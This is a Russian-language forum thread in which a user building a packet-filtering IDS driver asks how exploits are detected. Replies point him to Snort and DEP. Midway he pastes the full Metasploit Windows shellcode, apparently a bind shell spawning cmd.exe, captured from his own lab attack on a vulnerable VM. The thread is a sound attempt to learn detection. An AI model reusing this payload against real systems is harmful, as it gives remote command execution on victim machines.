Всем добрый день! Я скачал исходники антиэксплоита для Linux, для Windows такого я не нашел. Идея борьбы заключается в том что существует база данных MD5 хешей с которыми сравниваются пакеты. Мне хочется самому написать что-нибудь подобное, подскажите пожалуйста механизмы борьбы с експлоитами. Спасибо
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Правильный путь борьбы с эксплойтами - установка патчей (обновлений безопасности).
AndreyKa, спасибо. Я хочу знать какие алгоритмы применяются для борьбы с эксплоитами.
eboev, никакие, ибо "эксплоит"
так что борются с уязвимостями. а не с примерами их эксплуатации.
ЗЫ если вам в голову забивают гвоздь, то глупо бороться с молотком, надежней каску одеть, и руки забивальщику оторвать
Сообщение от Virtual
eboev, никакие, ибо "эксплоит"
так что борются с уязвимостями
ЗЫ если вам в голову забивают гвоздь, то глупо бороться с молотком, надежней каску одеть, и руки забивальщику оторватьможет мне в другой раздел написать?
eboev,
для начала изучить терминологию
http://virusinfo.info/showthread.php?t=1498
.далее, решить с какими конкретно типами опасностей хочеш боротся? //т.к. для каждого типа существуют свои и только свои методы.
.....
так что.? чего-ж конкретно то хочеш?
Эксплоит под windows и под linux две большие разницы. В основном эксплоиты "идут" не под конкретно операционную систему (хотя например кидо эксплуатировал уъязвимость именно Windows), а под приложения (Акробат ридер, флэш плейр, Офис, java). Поэтому собирать md5 сплоитов бессысленно - можно сделать миллион pdf файлов эксплуатирующих одну и тоже уъязвимость, но имющие разную md5 чек-сумму.
Alex_Goodwin, как я понял по сумбурному описанию, eboev говорил о системе IDS.
В любом случае ему следует для начала воспользоваться советом Virtual и научиться корректно излагать свою мысль.
По ссылке прошел и прочитал, спасибо
теперь к делу - експлоит это программный код который использует дыру: обычно он использует 3 самые распространенные уязвимости: стека, форматной строки и кучи. в результате происходит перезапись регистра, например регистра возврата и управление передается на shell код, который еще называют полезной нагрузкой. дальше - больше, это shell код например начинает загружать на машину жертвы троян. Я это описал для лучшего взаимопонимания, а теперь у меня есть NDIS и TDI драйвера и через мой драйвер проходит весь траффик. Я хочу предотвратить аттаку, спасибо Alex_Goodwin за напоминание термина IDS, это я и хочу сделать! И хочу попросить вас поделиться опытом.
У меня есть информация что есть сигнатуры на пакеты, например если пакет содержит только флаги SYN и FIN то это аттака и мой NDIS драйвер отбросит этот пакет
Посмотрите тут http://www.snortgroup.ru/
Респект Alex_Goodwin
Snort - отличная штука, спасибо вам буду использовать его идеи. Я не нашел подобного, имеются какие - нибудь еще проекты IDS с открытыми исходниками?
Самая простая реализация пакетного фильтра сетевых атак описана вот в этом RFC: http://www.networksorcery.com/enp/rfc/rfc3514.txt
Не знаю, почему его никто не читает...
Поставил виртуальную машину, на нее залил заведомо дырявый Windows. Запустил на виртуальной машине Wireshark, чтобы анализировать входящие пакеты. На родной машине поставил Metasploit Framework 3 и пробил виртуалку, в целях безопасности не буду говорить каким эксплоитом и shell-кодом. Далее я проанализировал shell скрипт, он содержит байт код:
'Payload' =>
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\ x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\ x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\ xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\ xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\ x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\ x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\ x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\ x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\ x12\xEB\x86\x5D" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\ x4C\x77\x26\x07" +
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\ x29\x80\x6B\x00" +
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\ x0F\xDF\xE0\xFF" +
"\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\ xE6\x6A\x10\x56" +
"\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\ xE9\x38\xFF\xFF" +
"\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\ x89\xC7\x68\x75" +
"\x6E\x4D\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89\xE3\ x57\x57\x57\x31" +
"\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\ x01\x01\x8D\x44" +
"\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\ x4E\x56\x56\x53" +
"\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\ x46\xFF\x30\x68" +
"\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\ xA6\x95\xBD\x9D" +
"\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\ x47\x13\x72\x6F" +
"\x6A\x00\x53\xFF\xD5".
В этом байт-коде есть последовательность \x63\x6D\x64 = cmd, shell код поднимает cmd на машине жертвы. Но вот что странно: я анализировал все входящие пакеты на машине жертвы с помощью Wireshark и не встретил там последовательности cmd, как shell коду удалось запустить cmd.exe?
eboev,
по вопросу... а в пакетах и не должно в явном виде быть искомого., ибо уязвимость может быть напр за транслятором из юникода в ... //это простейший пример. (создай 2 файла в юникоде и в анси, открой хекс редактором и почувствуй разницу)
>>eboev, рано вам начинать заниматся вирусописательством
>>(создай 2 файла в юникоде и в анси, открой хекс редактором и почувствуй >>разницу)
все проделал, там в юникоде 2 байта, последовательность будет c.m.d. такой последовательности в пакетах тоже нет. есть предположение что шелл код шифруется.
eboev, возможно но врятли ибо и так хлопот хватает.
в общем и частном случае, забудь про сигнатурный поиск цмд
т.к.
1. обычно шелкод это исполняемый код а не данные!!! соответственно //упрощенный пример, это может быть
Код:push 'C' push 'M' push 'D' push '.' push 'E' push 'X' push 'E' call xxxx.
а может и так
Код:push 'M' push 'C' push '.' push 'D' push 'X' push 'E' push 00h push 'E' call xxxx
в более сложных вариантах, накладываются ограничения. типа таких как не должно быть 00H в коде /это самое часто встречаемое/
(вот сам попробуй на асме такой код написать, поверь возможно, но хлопотно)
соответственно код исковеркан до неузнаваемости, и это не чтоб ты непонял, а только все ради того, дабы протащить его через лабиринт дыр в системе.
content:"|05 00 00|".
>>в общем и частном случае, забудь про сигнатурный поиск цмд
Я теперь подумываю над возможностью мониторить изменение регистра eip.
eboev, DEP этим занимается)))
The worst foe lies within the self...
Ваши права в разделе
Ответить с цитированием
